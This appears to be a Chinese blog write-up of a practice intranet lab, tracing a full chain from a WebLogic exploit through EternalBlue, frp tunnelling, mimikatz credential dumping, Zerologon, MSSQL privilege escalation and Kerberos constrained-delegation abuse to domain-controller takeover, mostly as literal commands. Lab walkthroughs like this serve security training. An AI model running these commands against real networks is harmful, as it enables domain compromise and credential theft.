记一次内网靶场学习

VSole2021-12-15 15:56:44

环境搭建

web服务器:

外网IP 192.160.0.100

内网IP 10.10.20.12

域内机器win7 :

内网IP 10.10.20.7

内网IP 10.10.10.7

域内服务器 Mssql:

内网IP 10.10.10.18

域控机器:

内网IP 10.10.10.8

外网渗透

端口扫描

搭建好环境,对目标192.168.0.100进行端口扫描探测

目录扫描

发现目标开放了7001端口,进行目录扫描探测,发现weblogic登录口

weblogic漏洞利用

尝试weblogic弱口令登录不成功

通过weblogic漏洞利用工具,发现目标存在CVE-2020-2551漏洞可以利用

出网探测

ping www.baidu.com发现目标机器出网

杀软识别

tasklist /svc 通过进程对比发现主机上没有安装杀软

直接powershell上线cs

内网渗透

信息搜集

通过执行命令whoami /all发现存在双网卡

密码凭据抓取

通过hashdump抓取密码Administrator ccef208c6485269c20db2cad21734fe7

ntlm hash值为ccef208c6485269c20db2cad21734fe7,通过cmd5解出明文密码Admin12345

横向移动

有了明文密码我们可以进行远程登陆,但真实环境中不到万不得已一般不建议执行此操作,因此寻找其他的方法进行内网横向移动

通过上传fscan扫描10网段,发现存在ms17-010漏洞的10.10.20.7主机

一开始打算通过Eternalblue直接上线cs,发现不成功,改用其他方法

项目地址:https://github.com/0xFenrik/Eternalblue

隧道搭建

上传frp搭建隧道代理

[common]#frpc配置
server_addr = VPS地址
server_port = 7000
[plugin_socks]
type = tcp
remote_port = 1080
plugin = socks5
[common]#frps配置
bind_addr =0.0.0.0
bind_port = 7000

永恒之蓝ms17-010

改用metaspolit,调用永恒之蓝模块进行攻击,成功获取shell

msf6 > setg Proxies socks5:frps服务端IP:监听端口
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhost 10.10.20.7
msf6 > run

或者vi /etc/proxychains.conf修改配置文件socks5 127.0.0.1 1080

然后通过proxychains msfconsole启动

成功后通过mimikatz执行creds_all获取账户密码redteam\saul:admin!@#45

中转上线

由于目标机器win7不出网,因此以跳板机器作为中转,新建一个监听器

通过psexec进行上线

成功上线后进行内网扫描,探测存活主机,发现还存在10.10.10.810.10.10.18两台机器

通过信息搜集发现当前机器是在域环境内net user /domain

定位域控

接着定位到域控 net group "domain controllers" /domain

ps:一般来说DNS服务器就是域控

CVE-2020-1472

影响版本:

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

通过CVE-2020-1472脚本进行检测

项目地址:https://github.com/SecuraBV/CVE-2020-1472

1、重置管理员密钥,进行置空

python3 cve-2020-1472-exploit.py OWA 10.10.10.8

2、通过 Dcsync 查看密码hash

python secretsdump.py redteam.red/OWA$@10.10.10.8 -just-dc -no-pass

3、通过psexec和hash获取域控权限

python psexec.py administrator@10.10.10.8 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7

4、使用secretsdump解析保存在本地的nt hash

reg save HKLM\SAM sam.save

reg save HKLM\SYSTEM system.save

reg save HKLM\SECURITY security.save

python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

5、通过reinstall脚本将$MACHINE.ACC:plain_password_hex中的原来nt hash恢复

python reinstall_original_pw.py OWA 10.10.10.8 8623dc75ede3ca9ec11f2475b12ef96d

约束委派接管域控

1、通过adfind寻找约束委派的用户,发现为sqlserver的机器

AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

2、通过端口探测发现sqlserver为10.10.10.18机器

3、使用fscan进行扫描fscan.exe -h 10.10.10.0/24 sqlserver为弱口令sa/sa

4、使用工具查看当前权限SharpSQLTools.exe 10.10.10.18 sa sa master xp_cmdshell whoami

项目地址:https://github.com/uknowsec/SharpSQLTools/releases/tag/41

5、权限较低,使用以下命令进行提权:

SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami

SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr

SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami

6、上线CS并抓到sqlserver的密码redteam\sqlserver Server12345

根据先前的信息搜集可知 sqlserver 是一个约束委派用户,可以通过约束委派攻击来接管域控

项目地址:https://github.com/gentilkiwi/kekeo/releases

1、利用 kekeo 请求该用户的 TGT

kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"

2、然后使用这张 TGT 获取域机器的 ST

kekeo.exe "tgs::s4u /tgt: TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red /service:cifs/owa.redteam.red"

3、使用 mimikatz 将 ST 导入当前会话,运行 mimikatz 进行 ptt

mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi

4、成功获取域控权限

内网ipsqlserver
本作品采用《CC 协议》,转载必须注明作者和本文链接
记一次靶场学习
2021-12-15 15:56:44
记一次靶场学习
因为 web 服务器同时连接了外,所以必须首先拿下。这里有关 web 服务器的渗透不展开讲了,无非也就是利用漏洞,诸如:弱口令、上传漏洞、远程代码执行、各种 cms 漏洞,总之都是可以找到写入 webshell 的方法。成功写入 webshell 后,接着就要上传木马控制 web 服务器,这里可以用 Metasploit或 Cobaltstrike。
Part1 前言 大家好,我是ABC_123,不知不觉,我一个人已经连续写了51篇原创文章了。本期复盘一次
成功getshell后通过冰蝎上传了一个哥斯拉shell接下来就是socks5代理了,上传一个frp后发现服务端关了,事发突然并没有做什么权限维持,到手的shell飞了经过分析和思考,造成这种情况的原因是直接拿了编译好的frp没做免杀,也许有全流量,设备报警提醒了,管理员发现异常后直接关机了。
上整理的⾯试问题⼤全,有些 HW ⾯试的题,已经收集好了,提供给⼤家。
提权需要的东西有点儿多,笔记里出现的工具不建议在百度上下载。如果支持aspx,可以上传aspx,通过aspx大马,直接调用默认cmd扫描扫出了其他人的大马可以尝试用?
起因,由于前几天拿了一个菠菜站的webshell,但是只有iis权限,执行无法创建用户等操作,更无法对整个服务器进行控制了,于是此时便需要提权了,对于一个刚刚入门的小白来说,此刻真正意识到了提权的重要性,于是便开始学习提取相关知识,以拿下该菠菜的站点。提权前的准备工作1,通常来说,不同的脚本所处的权限是不一样的。
红队小技巧
2022-07-12 07:01:57
前言 有一段时间没有写文章了,也不知写什么,毕竟从攻击方换成防守方,乙方换到甲方,还有些许不适应。。。此外,本文为口嗨文,基本在说思路,没有实操。其实钓鱼的话可以配合弱口令去后台看看能不能改一些
本文记录了一次针对具有二层的域环境进行渗透测试的过程,文中涉及了域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。看到了weblogic的版本,查找下exp,顺手先来一波smb信息收集。
网上已经有很多表哥写了关于域委派的文章,这里基于自己的理解大概写了关于委派的认证和利用过程
VSole
网络安全专家